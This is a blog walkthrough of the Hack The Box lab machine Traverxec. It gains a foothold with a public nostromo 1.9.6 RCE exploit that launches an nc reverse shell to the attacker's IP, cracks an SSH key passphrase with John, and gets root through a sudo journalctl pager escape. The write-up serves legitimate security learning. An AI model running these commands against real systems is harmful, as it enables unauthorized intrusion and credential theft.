Pages

Search

HTB Traverxec

$nmap -T4 -A -p- 10.10.10.165

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-04 10:03 CET
Nmap scan report for 10.10.10.165
Host is up (0.039s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.52 seconds

Open ports:

  • 22/tcp open ssh OpenSSH 7.9p1 Debian
  • 80/tcp open http nostromo 1.9.6

Nostromo v1.9.6 web server (http://www.nazgul.ch/dev_nostromo.html)

$searchsploit nostromo

Nostromo - Directory Traversal Remote Command Execution (Metasploit) | multiple/remote/47573.rb                                                                                                                                              
nostromo 1.9.6 - Remote Code Execution | multiple/remote/47837.py                                                                                                                                                                                            
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution | linux/remote/35466.sh                                                                                                                                                                  

Our web server is vulnerable to an RCE… 🙂

$searchsploit -m 47837

Exploit: nostromo 1.9.6 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47837
     Path: /usr/share/exploitdb/exploits/multiple/remote/47837.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/ruben/htb/traverxec/47837.py

$python 47837.py 10.10.10.165 80 "nc -e bash 10.10.14.15 1234"
$nc -lnvp 1234

listening on [any] 1234 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.165] 42892

whoami

www-data

python3 -c "import pty;pty.spawn('/bin/bash')"

www-data@traverxec:/usr/bin$

We are www-data, let’s enumerate a little bit.

www-data@traverxec:/var/nostromo/conf$ ls -la

ls -la
total 20
drwxr-xr-x 2 root daemon 4096 Oct 27  2019 .
drwxr-xr-x 6 root root   4096 Oct 25  2019 ..
-rw-r--r-- 1 root bin      41 Oct 25  2019 .htpasswd
-rw-r--r-- 1 root bin    2928 Oct 25  2019 mimes
-rw-r--r-- 1 root bin     498 Oct 25  2019 nhttpd.conf

www-data@traverxec:/var/nostromo/conf$ cat .htpasswd

david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

$chmod 600 david.key
$ssh -i david.key david@10.10.10.165

Enter passphrase for key 'david.key':

It needs a password, but we can crack it using John.

$python /usr/share/john/ssh2john.py david.key > david_key.hash
$john david_key.hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (david.key)
1g 0:00:00:06 96,37% (ETA: 13:23:03) 0.1663g/s 2303Kp/s 2303Kc/s 2303KC/s 08131517..0813137355

$ssh -i david.key david@10.10.10.165

Enter passphrase for key 'david.key': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$

david@traverxec:~$ ls

bin public_www user.txt

david@traverxec:~$ cat user.txt

7db0XXXXXXXXXXXXXXXXXXXXXXXXXXXX

david@traverxec:~/bin$ cat server-stats.sh

#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 
david@traverxec:~/bin$

david@traverxec:~/bin$ ./server-stats.sh

Load:  07:39:46 up  3:38,  1 user,  load average: 0.00, 0.01, 0.00
 
Open nhttpd sockets: 2
Files in the docroot: 117
 
Last 5 journal log lines:
-- Logs begin at Fri 2020-12-04 04:01:12 EST, end at Fri 2020-12-04 07:39:46 EST. --
Dec 04 04:01:14 traverxec systemd[1]: Starting nostromo nhttpd server...
Dec 04 04:01:14 traverxec nhttpd[421]: started
Dec 04 04:01:14 traverxec nhttpd[421]: max. file descriptors = 1040 (cur) / 1040 (max)
Dec 04 04:01:14 traverxec systemd[1]: Started nostromo nhttpd server.

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

Journalctl is a utility for querying and displaying logs from journald, systemd’s logging service.

https://www.loggly.com/ultimate-guide/using-journalctl/

david@traverxec:~/bin$ ls -la /usr/bin/journalctl

-rwxr-xr-x 1 root root 67672 Aug 20 2019 /usr/bin/journalctl

According to the journalctl man page:

The output is paged through less by default, and long lines are "truncated" to screen width. The hidden part can be viewed by using the left-arrow and right-arrow keys. Paging can be disabled; see the --no-pager option and the "Environment" section below.

And taking into account that based on less help,

!command      Execute the shell command with $SHELL.

! command can be used to run commands.

More information can be found here: https://gtfobins.github.io/gtfobins/journalctl/

Here there is a trick related to less and its purpose to get this result. I got stuck here for a long time, but I was funny when I realized 🙂

root@traverxec:/home/david/bin# cat /root/root.txt

9aa3XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *